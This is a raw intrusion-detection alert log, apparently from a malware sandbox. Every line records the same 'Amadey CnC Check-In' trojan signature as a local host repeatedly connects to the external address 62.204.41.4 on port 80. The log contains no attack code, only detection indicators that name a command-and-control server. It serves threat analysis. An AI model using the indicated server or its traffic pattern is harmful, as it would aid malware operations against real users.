192.168.2.662.204.41.449992802027700 02/07/23-20:02:06.575939	TCP	2027700	ET TROJAN Amadey CnC Check-In	49992	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450068802027700 02/07/23-20:02:31.452026	TCP	2027700	ET TROJAN Amadey CnC Check-In	50068	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450460802027700 02/07/23-20:04:13.772290	TCP	2027700	ET TROJAN Amadey CnC Check-In	50460	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449989802027700 02/07/23-20:02:05.120374	TCP	2027700	ET TROJAN Amadey CnC Check-In	49989	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449735802027700 02/07/23-20:00:54.983578	TCP	2027700	ET TROJAN Amadey CnC Check-In	49735	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450354802027700 02/07/23-20:03:47.847893	TCP	2027700	ET TROJAN Amadey CnC Check-In	50354	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450022802027700 02/07/23-20:02:16.443010	TCP	2027700	ET TROJAN Amadey CnC Check-In	50022	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450063802027700 02/07/23-20:02:28.396717	TCP	2027700	ET TROJAN Amadey CnC Check-In	50063	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450276802027700 02/07/23-20:03:28.648274	TCP	2027700	ET TROJAN Amadey CnC Check-In	50276	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449948802027700 02/07/23-20:01:54.830001	TCP	2027700	ET TROJAN Amadey CnC Check-In	49948	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450141802027700 02/07/23-20:02:53.400943	TCP	2027700	ET TROJAN Amadey CnC Check-In	50141	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450395802027700 02/07/23-20:03:57.910152	TCP	2027700	ET TROJAN Amadey CnC Check-In	50395	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450100802027700 02/07/23-20:02:39.901405	TCP	2027700	ET TROJAN Amadey CnC Check-In	50100	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450313802027700 02/07/23-20:03:37.774355	TCP	2027700	ET TROJAN Amadey CnC Check-In	50313	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450271802027700 02/07/23-20:03:27.422593	TCP	2027700	ET TROJAN Amadey CnC Check-In	50271	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449984802027700 02/07/23-20:02:03.441087	TCP	2027700	ET TROJAN Amadey CnC Check-In	49984	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449943802027700 02/07/23-20:01:53.532965	TCP	2027700	ET TROJAN Amadey CnC Check-In	49943	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449730802027700 02/07/23-20:00:53.793502	TCP	2027700	ET TROJAN Amadey CnC Check-In	49730	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450289802027700 02/07/23-20:03:31.813234	TCP	2027700	ET TROJAN Amadey CnC Check-In	50289	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450035802027700 02/07/23-20:02:19.615798	TCP	2027700	ET TROJAN Amadey CnC Check-In	50035	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450248802027700 02/07/23-20:03:19.236086	TCP	2027700	ET TROJAN Amadey CnC Check-In	50248	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450207802027700 02/07/23-20:03:09.251394	TCP	2027700	ET TROJAN Amadey CnC Check-In	50207	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450432802027700 02/07/23-20:04:06.987943	TCP	2027700	ET TROJAN Amadey CnC Check-In	50432	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450390802027700 02/07/23-20:03:56.676042	TCP	2027700	ET TROJAN Amadey CnC Check-In	50390	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450174802027700 02/07/23-20:03:01.410759	TCP	2027700	ET TROJAN Amadey CnC Check-In	50174	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450367802027700 02/07/23-20:03:51.006859	TCP	2027700	ET TROJAN Amadey CnC Check-In	50367	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449748802027700 02/07/23-20:00:58.128864	TCP	2027700	ET TROJAN Amadey CnC Check-In	49748	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450015802027700 02/07/23-20:02:14.676485	TCP	2027700	ET TROJAN Amadey CnC Check-In	50015	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450113802027700 02/07/23-20:02:43.134587	TCP	2027700	ET TROJAN Amadey CnC Check-In	50113	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450269802027700 02/07/23-20:03:26.932435	TCP	2027700	ET TROJAN Amadey CnC Check-In	50269	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450263802027700 02/07/23-20:03:25.380080	TCP	2027700	ET TROJAN Amadey CnC Check-In	50263	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450272802027700 02/07/23-20:03:27.657286	TCP	2027700	ET TROJAN Amadey CnC Check-In	50272	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450370802027700 02/07/23-20:03:51.805979	TCP	2027700	ET TROJAN Amadey CnC Check-In	50370	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450361802027700 02/07/23-20:03:49.565590	TCP	2027700	ET TROJAN Amadey CnC Check-In	50361	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449739802027700 02/07/23-20:00:55.935980	TCP	2027700	ET TROJAN Amadey CnC Check-In	49739	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450006802027700 02/07/23-20:02:12.401268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50006	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450358802027700 02/07/23-20:03:48.800828	TCP	2027700	ET TROJAN Amadey CnC Check-In	50358	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449837802027700 02/07/23-20:01:21.459260	TCP	2027700	ET TROJAN Amadey CnC Check-In	49837	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450202802027700 02/07/23-20:03:08.029585	TCP	2027700	ET TROJAN Amadey CnC Check-In	50202	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450456802027700 02/07/23-20:04:12.818077	TCP	2027700	ET TROJAN Amadey CnC Check-In	50456	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450104802027700 02/07/23-20:02:40.952138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50104	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449809802027700 02/07/23-20:01:14.874634	TCP	2027700	ET TROJAN Amadey CnC Check-In	49809	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450333802027700 02/07/23-20:03:42.674478	TCP	2027700	ET TROJAN Amadey CnC Check-In	50333	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450235802027700 02/07/23-20:03:16.065619	TCP	2027700	ET TROJAN Amadey CnC Check-In	50235	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450431802027700 02/07/23-20:04:06.742108	TCP	2027700	ET TROJAN Amadey CnC Check-In	50431	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449910802027700 02/07/23-20:01:41.844449	TCP	2027700	ET TROJAN Amadey CnC Check-In	49910	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449977802027700 02/07/23-20:02:01.710756	TCP	2027700	ET TROJAN Amadey CnC Check-In	49977	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449723802027700 02/07/23-20:00:52.073819	TCP	2027700	ET TROJAN Amadey CnC Check-In	49723	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449879802027700 02/07/23-20:01:34.335804	TCP	2027700	ET TROJAN Amadey CnC Check-In	49879	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449821802027700 02/07/23-20:01:17.548025	TCP	2027700	ET TROJAN Amadey CnC Check-In	49821	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449812802027700 02/07/23-20:01:15.578134	TCP	2027700	ET TROJAN Amadey CnC Check-In	49812	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449968802027700 02/07/23-20:01:59.735492	TCP	2027700	ET TROJAN Amadey CnC Check-In	49968	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449770802027700 02/07/23-20:01:03.285971	TCP	2027700	ET TROJAN Amadey CnC Check-In	49770	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449767802027700 02/07/23-20:01:02.575091	TCP	2027700	ET TROJAN Amadey CnC Check-In	49767	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449882802027700 02/07/23-20:01:34.875626	TCP	2027700	ET TROJAN Amadey CnC Check-In	49882	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450440802027700 02/07/23-20:04:08.934141	TCP	2027700	ET TROJAN Amadey CnC Check-In	50440	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450291802027700 02/07/23-20:03:32.300203	TCP	2027700	ET TROJAN Amadey CnC Check-In	50291	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449971802027700 02/07/23-20:02:00.459434	TCP	2027700	ET TROJAN Amadey CnC Check-In	49971	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450244802027700 02/07/23-20:03:18.251405	TCP	2027700	ET TROJAN Amadey CnC Check-In	50244	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450429802027700 02/07/23-20:04:06.205613	TCP	2027700	ET TROJAN Amadey CnC Check-In	50429	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450339802027700 02/07/23-20:03:44.150750	TCP	2027700	ET TROJAN Amadey CnC Check-In	50339	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450043802027700 02/07/23-20:02:21.535774	TCP	2027700	ET TROJAN Amadey CnC Check-In	50043	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450297802027700 02/07/23-20:03:33.829768	TCP	2027700	ET TROJAN Amadey CnC Check-In	50297	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450132802027700 02/07/23-20:02:51.157888	TCP	2027700	ET TROJAN Amadey CnC Check-In	50132	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450173802027700 02/07/23-20:03:01.155358	TCP	2027700	ET TROJAN Amadey CnC Check-In	50173	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450386802027700 02/07/23-20:03:55.723368	TCP	2027700	ET TROJAN Amadey CnC Check-In	50386	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450216802027700 02/07/23-20:03:11.470014	TCP	2027700	ET TROJAN Amadey CnC Check-In	50216	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450428802027700 02/07/23-20:04:05.975695	TCP	2027700	ET TROJAN Amadey CnC Check-In	50428	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450084802027700 02/07/23-20:02:35.626446	TCP	2027700	ET TROJAN Amadey CnC Check-In	50084	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449952802027700 02/07/23-20:01:55.791186	TCP	2027700	ET TROJAN Amadey CnC Check-In	49952	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450412802027700 02/07/23-20:04:02.064925	TCP	2027700	ET TROJAN Amadey CnC Check-In	50412	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449911802027700 02/07/23-20:01:42.093950	TCP	2027700	ET TROJAN Amadey CnC Check-In	49911	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450305802027700 02/07/23-20:03:35.785500	TCP	2027700	ET TROJAN Amadey CnC Check-In	50305	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449751802027700 02/07/23-20:00:58.872163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49751	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449840802027700 02/07/23-20:01:22.187785	TCP	2027700	ET TROJAN Amadey CnC Check-In	49840	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449898802027700 02/07/23-20:01:38.811965	TCP	2027700	ET TROJAN Amadey CnC Check-In	49898	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450399802027700 02/07/23-20:03:58.878195	TCP	2027700	ET TROJAN Amadey CnC Check-In	50399	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450047802027700 02/07/23-20:02:22.518279	TCP	2027700	ET TROJAN Amadey CnC Check-In	50047	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450145802027700 02/07/23-20:02:54.357855	TCP	2027700	ET TROJAN Amadey CnC Check-In	50145	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450231802027700 02/07/23-20:03:15.107613	TCP	2027700	ET TROJAN Amadey CnC Check-In	50231	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450056802027700 02/07/23-20:02:24.870217	TCP	2027700	ET TROJAN Amadey CnC Check-In	50056	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450228802027700 02/07/23-20:03:14.349981	TCP	2027700	ET TROJAN Amadey CnC Check-In	50228	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450062802027700 02/07/23-20:02:28.090658	TCP	2027700	ET TROJAN Amadey CnC Check-In	50062	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450317802027700 02/07/23-20:03:38.748560	TCP	2027700	ET TROJAN Amadey CnC Check-In	50317	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450219802027700 02/07/23-20:03:12.179097	TCP	2027700	ET TROJAN Amadey CnC Check-In	50219	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449838802027700 02/07/23-20:01:21.703798	TCP	2027700	ET TROJAN Amadey CnC Check-In	49838	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450457802027700 02/07/23-20:04:13.065112	TCP	2027700	ET TROJAN Amadey CnC Check-In	50457	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449936802027700 02/07/23-20:01:51.820246	TCP	2027700	ET TROJAN Amadey CnC Check-In	49936	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450301802027700 02/07/23-20:03:34.801016	TCP	2027700	ET TROJAN Amadey CnC Check-In	50301	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450203802027700 02/07/23-20:03:08.264782	TCP	2027700	ET TROJAN Amadey CnC Check-In	50203	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449853802027700 02/07/23-20:01:25.706873	TCP	2027700	ET TROJAN Amadey CnC Check-In	49853	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449894802027700 02/07/23-20:01:37.843818	TCP	2027700	ET TROJAN Amadey CnC Check-In	49894	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449755802027700 02/07/23-20:00:59.855021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49755	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449927802027700 02/07/23-20:01:49.659609	TCP	2027700	ET TROJAN Amadey CnC Check-In	49927	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450288802027700 02/07/23-20:03:31.578001	TCP	2027700	ET TROJAN Amadey CnC Check-In	50288	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450158802027700 02/07/23-20:02:57.529246	TCP	2027700	ET TROJAN Amadey CnC Check-In	50158	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450383802027700 02/07/23-20:03:54.971539	TCP	2027700	ET TROJAN Amadey CnC Check-In	50383	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449764802027700 02/07/23-20:01:01.795053	TCP	2027700	ET TROJAN Amadey CnC Check-In	49764	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450028802027700 02/07/23-20:02:17.895696	TCP	2027700	ET TROJAN Amadey CnC Check-In	50028	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450342802027700 02/07/23-20:03:44.892172	TCP	2027700	ET TROJAN Amadey CnC Check-In	50342	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449980802027700 02/07/23-20:02:02.464633	TCP	2027700	ET TROJAN Amadey CnC Check-In	49980	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450472802027700 02/07/23-20:04:16.721903	TCP	2027700	ET TROJAN Amadey CnC Check-In	50472	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450075802027700 02/07/23-20:02:33.175281	TCP	2027700	ET TROJAN Amadey CnC Check-In	50075	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450117802027700 02/07/23-20:02:44.156964	TCP	2027700	ET TROJAN Amadey CnC Check-In	50117	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450199802027700 02/07/23-20:03:07.326755	TCP	2027700	ET TROJAN Amadey CnC Check-In	50199	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450034802027700 02/07/23-20:02:19.362339	TCP	2027700	ET TROJAN Amadey CnC Check-In	50034	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450247802027700 02/07/23-20:03:18.979917	TCP	2027700	ET TROJAN Amadey CnC Check-In	50247	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450314802027700 02/07/23-20:03:38.017064	TCP	2027700	ET TROJAN Amadey CnC Check-In	50314	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449949802027700 02/07/23-20:01:55.074452	TCP	2027700	ET TROJAN Amadey CnC Check-In	49949	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450444802027700 02/07/23-20:04:09.894977	TCP	2027700	ET TROJAN Amadey CnC Check-In	50444	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450403802027700 02/07/23-20:03:59.851322	TCP	2027700	ET TROJAN Amadey CnC Check-In	50403	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449908802027700 02/07/23-20:01:41.349767	TCP	2027700	ET TROJAN Amadey CnC Check-In	49908	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449866802027700 02/07/23-20:01:31.109835	TCP	2027700	ET TROJAN Amadey CnC Check-In	49866	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450320802027700 02/07/23-20:03:39.480009	TCP	2027700	ET TROJAN Amadey CnC Check-In	50320	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449736802027700 02/07/23-20:00:55.230834	TCP	2027700	ET TROJAN Amadey CnC Check-In	49736	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449783802027700 02/07/23-20:01:06.638994	TCP	2027700	ET TROJAN Amadey CnC Check-In	49783	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449996802027700 02/07/23-20:02:09.912452	TCP	2027700	ET TROJAN Amadey CnC Check-In	49996	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449825802027700 02/07/23-20:01:18.559732	TCP	2027700	ET TROJAN Amadey CnC Check-In	49825	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449742802027700 02/07/23-20:00:56.667263	TCP	2027700	ET TROJAN Amadey CnC Check-In	49742	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449955802027700 02/07/23-20:01:56.500323	TCP	2027700	ET TROJAN Amadey CnC Check-In	49955	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450018802027700 02/07/23-20:02:15.452445	TCP	2027700	ET TROJAN Amadey CnC Check-In	50018	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450309802027700 02/07/23-20:03:36.772736	TCP	2027700	ET TROJAN Amadey CnC Check-In	50309	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449947802027700 02/07/23-20:01:54.584701	TCP	2027700	ET TROJAN Amadey CnC Check-In	49947	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450082802027700 02/07/23-20:02:34.890335	TCP	2027700	ET TROJAN Amadey CnC Check-In	50082	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450214802027700 02/07/23-20:03:10.972258	TCP	2027700	ET TROJAN Amadey CnC Check-In	50214	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449993802027700 02/07/23-20:02:07.121549	TCP	2027700	ET TROJAN Amadey CnC Check-In	49993	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450355802027700 02/07/23-20:03:48.094654	TCP	2027700	ET TROJAN Amadey CnC Check-In	50355	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450471802027700 02/07/23-20:04:16.488079	TCP	2027700	ET TROJAN Amadey CnC Check-In	50471	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449852802027700 02/07/23-20:01:25.383304	TCP	2027700	ET TROJAN Amadey CnC Check-In	49852	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450003802027700 02/07/23-20:02:11.648732	TCP	2027700	ET TROJAN Amadey CnC Check-In	50003	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450453802027700 02/07/23-20:04:12.107650	TCP	2027700	ET TROJAN Amadey CnC Check-In	50453	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449929802027700 02/07/23-20:01:50.134882	TCP	2027700	ET TROJAN Amadey CnC Check-In	49929	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450177802027700 02/07/23-20:03:02.166311	TCP	2027700	ET TROJAN Amadey CnC Check-In	50177	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450275802027700 02/07/23-20:03:28.403496	TCP	2027700	ET TROJAN Amadey CnC Check-In	50275	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449965802027700 02/07/23-20:01:59.016140	TCP	2027700	ET TROJAN Amadey CnC Check-In	49965	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450293802027700 02/07/23-20:03:32.801081	TCP	2027700	ET TROJAN Amadey CnC Check-In	50293	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450327802027700 02/07/23-20:03:41.188880	TCP	2027700	ET TROJAN Amadey CnC Check-In	50327	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449806802027700 02/07/23-20:01:14.154494	TCP	2027700	ET TROJAN Amadey CnC Check-In	49806	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450425802027700 02/07/23-20:04:05.253501	TCP	2027700	ET TROJAN Amadey CnC Check-In	50425	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450097802027700 02/07/23-20:02:39.099671	TCP	2027700	ET TROJAN Amadey CnC Check-In	50097	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449769802027700 02/07/23-20:01:03.043961	TCP	2027700	ET TROJAN Amadey CnC Check-In	49769	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450410802027700 02/07/23-20:04:01.580414	TCP	2027700	ET TROJAN Amadey CnC Check-In	50410	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450054802027700 02/07/23-20:02:24.270996	TCP	2027700	ET TROJAN Amadey CnC Check-In	50054	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449787802027700 02/07/23-20:01:09.515244	TCP	2027700	ET TROJAN Amadey CnC Check-In	49787	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450388802027700 02/07/23-20:03:56.189946	TCP	2027700	ET TROJAN Amadey CnC Check-In	50388	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450036802027700 02/07/23-20:02:19.847586	TCP	2027700	ET TROJAN Amadey CnC Check-In	50036	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450092802027700 02/07/23-20:02:37.868052	TCP	2027700	ET TROJAN Amadey CnC Check-In	50092	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450232802027700 02/07/23-20:03:15.344051	TCP	2027700	ET TROJAN Amadey CnC Check-In	50232	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449957802027700 02/07/23-20:01:56.989416	TCP	2027700	ET TROJAN Amadey CnC Check-In	49957	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450031802027700 02/07/23-20:02:18.637614	TCP	2027700	ET TROJAN Amadey CnC Check-In	50031	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450250802027700 02/07/23-20:03:19.754500	TCP	2027700	ET TROJAN Amadey CnC Check-In	50250	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449862802027700 02/07/23-20:01:30.125467	TCP	2027700	ET TROJAN Amadey CnC Check-In	49862	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450481802027700 02/07/23-20:04:18.893120	TCP	2027700	ET TROJAN Amadey CnC Check-In	50481	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450072802027700 02/07/23-20:02:32.475919	TCP	2027700	ET TROJAN Amadey CnC Check-In	50072	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449779802027700 02/07/23-20:01:05.232360	TCP	2027700	ET TROJAN Amadey CnC Check-In	49779	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449870802027700 02/07/23-20:01:32.078335	TCP	2027700	ET TROJAN Amadey CnC Check-In	49870	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449998802027700 02/07/23-20:02:10.416841	TCP	2027700	ET TROJAN Amadey CnC Check-In	49998	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450108802027700 02/07/23-20:02:41.932133	TCP	2027700	ET TROJAN Amadey CnC Check-In	50108	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450149802027700 02/07/23-20:02:55.389818	TCP	2027700	ET TROJAN Amadey CnC Check-In	50149	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450026802027700 02/07/23-20:02:17.408058	TCP	2027700	ET TROJAN Amadey CnC Check-In	50026	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449975802027700 02/07/23-20:02:01.204512	TCP	2027700	ET TROJAN Amadey CnC Check-In	49975	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450222802027700 02/07/23-20:03:12.933465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50222	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449797802027700 02/07/23-20:01:12.000477	TCP	2027700	ET TROJAN Amadey CnC Check-In	49797	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450204802027700 02/07/23-20:03:08.498529	TCP	2027700	ET TROJAN Amadey CnC Check-In	50204	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450398802027700 02/07/23-20:03:58.636270	TCP	2027700	ET TROJAN Amadey CnC Check-In	50398	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449834802027700 02/07/23-20:01:20.722458	TCP	2027700	ET TROJAN Amadey CnC Check-In	49834	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450400802027700 02/07/23-20:03:59.133077	TCP	2027700	ET TROJAN Amadey CnC Check-In	50400	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450008802027700 02/07/23-20:02:12.917280	TCP	2027700	ET TROJAN Amadey CnC Check-In	50008	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449811802027700 02/07/23-20:01:15.342261	TCP	2027700	ET TROJAN Amadey CnC Check-In	49811	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450044802027700 02/07/23-20:02:21.772716	TCP	2027700	ET TROJAN Amadey CnC Check-In	50044	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450393802027700 02/07/23-20:03:57.421090	TCP	2027700	ET TROJAN Amadey CnC Check-In	50393	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450041802027700 02/07/23-20:02:21.067703	TCP	2027700	ET TROJAN Amadey CnC Check-In	50041	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449967802027700 02/07/23-20:01:59.487215	TCP	2027700	ET TROJAN Amadey CnC Check-In	49967	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449909802027700 02/07/23-20:01:41.612708	TCP	2027700	ET TROJAN Amadey CnC Check-In	49909	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450237802027700 02/07/23-20:03:16.563327	TCP	2027700	ET TROJAN Amadey CnC Check-In	50237	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449860802027700 02/07/23-20:01:29.628066	TCP	2027700	ET TROJAN Amadey CnC Check-In	49860	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450252802027700 02/07/23-20:03:20.248979	TCP	2027700	ET TROJAN Amadey CnC Check-In	50252	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450415802027700 02/07/23-20:04:02.837203	TCP	2027700	ET TROJAN Amadey CnC Check-In	50415	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449789802027700 02/07/23-20:01:10.000649	TCP	2027700	ET TROJAN Amadey CnC Check-In	49789	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450160802027700 02/07/23-20:02:58.000084	TCP	2027700	ET TROJAN Amadey CnC Check-In	50160	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450430802027700 02/07/23-20:04:06.494424	TCP	2027700	ET TROJAN Amadey CnC Check-In	50430	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449832802027700 02/07/23-20:01:20.240759	TCP	2027700	ET TROJAN Amadey CnC Check-In	49832	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450451802027700 02/07/23-20:04:11.626762	TCP	2027700	ET TROJAN Amadey CnC Check-In	50451	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450013802027700 02/07/23-20:02:14.205368	TCP	2027700	ET TROJAN Amadey CnC Check-In	50013	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450016802027700 02/07/23-20:02:14.953404	TCP	2027700	ET TROJAN Amadey CnC Check-In	50016	80	192.168.2.6	62.204.41.4
